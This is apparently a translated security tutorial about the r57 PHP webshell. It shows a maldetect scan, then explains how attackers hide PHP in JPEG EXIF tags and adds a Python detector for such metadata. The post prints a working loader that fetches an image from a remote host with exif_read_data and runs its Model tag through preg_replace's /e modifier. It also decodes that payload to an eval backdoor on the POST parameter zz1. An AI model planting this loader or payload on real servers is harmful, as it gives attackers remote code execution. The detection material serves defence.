Demonstration with the (foreign) r57 webshell

First, look at the webshell's source code. Note the base64 encoding: after decoding, the PHP that runs generates a file-upload page.

Security scanning tools typically search the system for known webshell backdoor code in order to find such backdoors. We use maldetect (Linux Malware Detect) to analyze the r57 webshell:
$ sudo /usr/local/maldetect/maldet --config-option quar_hits=0,quar_clean=0,clamav_scan=1 -a "/tmp/lin.php"
Linux Malware Detect v1.4.2
(C) 2002-2013, R-fx Networks
(C) 2013, Ryan MacDonald
inotifywait (C) 2007, Rohan McGovern
This program may be freely redistributed under the terms of the GNU GPL v2
maldet(92294): {scan} signatures loaded: 9011 (7145 MD5 / 1866 HEX)
maldet(92294): {scan} building file list for /tmp/lin.php, this might take awhile...
maldet(92294): {scan} file list completed, found 1 files...
maldet(92294): {scan} 1/1 files scanned: 0 hits 0 cleaned
maldet(92294): {scan} scan completed on /tmp/lin.php: files 1, malware hits 1, cleaned hits 0
maldet(92294): {scan} scan report saved, to view run: maldet --report 101113-1250.92294
maldet(92294): {scan} quarantine is disabled! set quar_hits=1 in conf.maldet or to quarantine results run: maldet -q 101113-1250.92294

$ sudo maldet --report 101113-1250.92294
malware detect scan report for MacBook-Pro-2.local:
SCAN ID: 101113-1250.92294
TIME: Oct 11 12:50:48 -0400
PATH: /tmp/lin.php
TOTAL FILES: 1
TOTAL HITS: 1
TOTAL CLEANED: 0
NOTE: quarantine is disabled! set quar_hits=1 in conf.maldet or to quarantine results run: maldet -q 101113-1250.92294

FILE HIT LIST:
{MD5}base64.inject.unclassed.1 : /tmp/lin.php
===============================================
Linux Malware Detect v1.4.2 < proj@rfxn.com >
Maldetect scanned the file and flagged it as a base64-encoded PHP backdoor (signature base64.inject.unclassed.1).

To avoid such scanning, the data is carried in EXIF metadata instead. If you view the file's source in a browser, you can find the added string at the top of the file. Next, upload the file and view its EXIF data: the PHP code segment is inserted in standard EXIF format, and the insertion does not affect rendering of the image itself.

PHP's built-in function exif_read_data reads the image file's header (its EXIF metadata); Facebook, for example, reads this data from images. Therefore exif_read_data can be used to read an image, on the local or a remote host, whose file header contains the PHP code. The format is as follows:
$exif = exif_read_data('http://ruo.me/exif.jpg');preg_replace($exif['Make'],$exif['Model'],'');
Downloading the remote image assigns the result to the $exif array variable; dumping the array shows what was read from the header:
$exif = exif_read_data('http://ruo.me/exif.jpg');
var_dump($exif);
After execution, you get the following output:

$ php ./get.php
array(9) {
  ["FileName"]=>
  string(8) "exif.jpg"
  ["FileDateTime"]=>
  int(0)
  ["FileSize"]=>
  int(6159)
  ["FileType"]=>
  int(2)
  ["MimeType"]=>
  string(10) "image/jpeg"
  ["SectionsFound"]=>
  string(13) "ANY_TAG, IFD0"
  ["COMPUTED"]=>
  array(5) {
    ["html"]=>
    string(23) "width="155" height="77""
    ["Height"]=>
    int(77)
    ["Width"]=>
    int(155)
    ["IsColor"]=>
    int(1)
    ["ByteOrderMotorola"]=>
    int(0)
  }
  ["Make"]=>
  string(5) "/.*/e"
  ["Model"]=>
  string(108) "eval(base64_decode('aWYgKGlzc2V0KCRfUE9TVFsienoxIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));"
}

The last step is to run PHP's preg_replace function with the two values:
$exif = exif_read_data('http://ruo.me/exif.jpg');
preg_replace($exif['Make'], $exif['Model'], '');
Note the regular expression in the Make value: with the format /.*/e, the e (eval) modifier makes preg_replace execute the replacement string as PHP code, so the base64-decoded code is run. Decoding the base64 string in the Model value gives:

if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"]));}

This checks whether a POST parameter named zz1 is set and, if so, passes its value to eval.
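The same EXIF tags can be inspected on the defender's side. The following Python script is an added example, not code from the original post or from any tool it mentions: it walks a JPEG's marker segments, parses the APP1/Exif IFD0 entries itself (no external library), and flags ASCII tag values that look like PHP, such as a regex ending in the /e modifier, eval(, base64_decode( or a superglobal reference. The helper build_test_jpeg only produces an in-memory test fixture whose Make/Model values mirror the page's example (its base64 text is a placeholder for "ABC", not a payload); the scanner works on any JPEG bytes. One caveat for the technique itself: the /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so on a current PHP the preg_replace call no longer executes the replacement, but code carried in image metadata is still worth flagging because it marks a file that has been tampered with.

```python
import re
import struct

# IFD0 tags that hold free-form ASCII and are a natural place to hide text.
TAG_NAMES = {0x010E: "ImageDescription", 0x010F: "Make", 0x0110: "Model",
             0x0131: "Software", 0x013B: "Artist", 0x8298: "Copyright"}

# Indicators of PHP code inside a metadata string (labels are ours).
SUSPICIOUS_PATTERNS = [
    (re.compile(rb"^/.*/[a-zA-Z]*e[a-zA-Z]*$"), "regex with /e modifier"),
    (re.compile(rb"\beval\s*\("), "eval("),
    (re.compile(rb"\bbase64_decode\s*\("), "base64_decode("),
    (re.compile(rb"\$_(POST|GET|REQUEST|COOKIE)\b"), "PHP superglobal"),
    (re.compile(rb"<\?php"), "PHP open tag"),
]


def _parse_ifd0(tiff: bytes) -> dict:
    """Return {tag name: bytes} for the ASCII entries of IFD0 in a TIFF blob."""
    endian = {b"II": "<", b"MM": ">"}.get(tiff[:2])
    if endian is None or len(tiff) < 8:
        return {}
    magic, ifd_off = struct.unpack(endian + "HI", tiff[2:8])
    if magic != 42 or ifd_off + 2 > len(tiff):
        return {}
    count = struct.unpack(endian + "H", tiff[ifd_off:ifd_off + 2])[0]
    tags = {}
    for i in range(count):
        e = ifd_off + 2 + 12 * i
        if e + 12 > len(tiff):
            break
        tag, typ, n = struct.unpack(endian + "HHI", tiff[e:e + 8])
        if typ != 2:                      # 2 = ASCII; skip numeric/rational types
            continue
        if n <= 4:                        # short values are stored inline
            raw = tiff[e + 8:e + 8 + n]
        else:                             # longer values live at an offset
            off = struct.unpack(endian + "I", tiff[e + 8:e + 12])[0]
            raw = tiff[off:off + n]
        tags[TAG_NAMES.get(tag, "0x%04X" % tag)] = raw.rstrip(b"\0")
    return tags


def extract_exif_ascii_tags(jpeg: bytes) -> dict:
    """Walk the JPEG marker segments up to SOS and parse the APP1/Exif one."""
    if jpeg[:2] != b"\xFF\xD8":
        raise ValueError("not a JPEG (missing SOI)")
    tags, pos = {}, 2
    while pos + 2 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        if marker in (0xD9, 0xDA):        # EOI / SOS: APP segments must precede these
            break
        if marker in (0xD8, 0x01) or 0xD0 <= marker <= 0xD7:
            pos += 2                      # standalone markers carry no length field
            continue
        if pos + 4 > len(jpeg):
            break
        seg_len = struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        body = jpeg[pos + 4:pos + 2 + seg_len]
        if marker == 0xE1 and body.startswith(b"Exif\0\0"):
            tags.update(_parse_ifd0(body[6:]))
        pos += 2 + seg_len
    return tags


def scan_exif_for_php(jpeg: bytes) -> list:
    """Return (tag name, indicator) pairs for every suspicious metadata value."""
    findings = []
    for name, value in extract_exif_ascii_tags(jpeg).items():
        for pattern, label in SUSPICIOUS_PATTERNS:
            if pattern.search(value):
                findings.append((name, label))
    return findings


def build_test_jpeg(make: bytes, model: bytes) -> bytes:
    """Constructed test fixture: SOI + APP1/Exif (IFD0 with Make and Model) + EOI.
    It carries no image data and exists only to exercise the parser above."""
    entries = [(0x010F, make + b"\0"), (0x0110, model + b"\0")]
    ifd, blob = struct.pack("<H", len(entries)), b""
    data_off = 8 + 2 + 12 * len(entries) + 4   # first byte after the IFD
    for tag, value in entries:
        if len(value) <= 4:
            ifd += struct.pack("<HHI4s", tag, 2, len(value), value.ljust(4, b"\0"))
        else:
            ifd += struct.pack("<HHII", tag, 2, len(value), data_off + len(blob))
            blob += value
    ifd += struct.pack("<I", 0)                 # no next IFD
    tiff = b"II" + struct.pack("<HI", 42, 8) + ifd + blob
    app1_body = b"Exif\0\0" + tiff
    app1 = b"\xFF\xE1" + struct.pack(">H", len(app1_body) + 2) + app1_body
    return b"\xFF\xD8" + app1 + b"\xFF\xD9"


if __name__ == "__main__":
    # Values mirror the page's example; the base64 text here decodes to "ABC".
    bad = build_test_jpeg(b"/.*/e", b"eval(base64_decode('QUJD'));")
    good = build_test_jpeg(b"Canon", b"EOS 5D")
    print("suspicious:", scan_exif_for_php(bad))
    print("benign:", scan_exif_for_php(good))
```

To use it against real files, read the image bytes and call scan_exif_for_php; a non-empty result is a reason to quarantine the file and look at the web server's POST traffic to scripts that call exif_read_data on uploads. The parser deliberately stops at the SOS marker, since Exif metadata must sit in the APP segments before the entropy-coded image data.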
The exif_read_data and preg_replace functions together form the remotely accessible backdoor. This backdoor is widely used; the base64-encoded code has been seen in hundreds of attacked instances: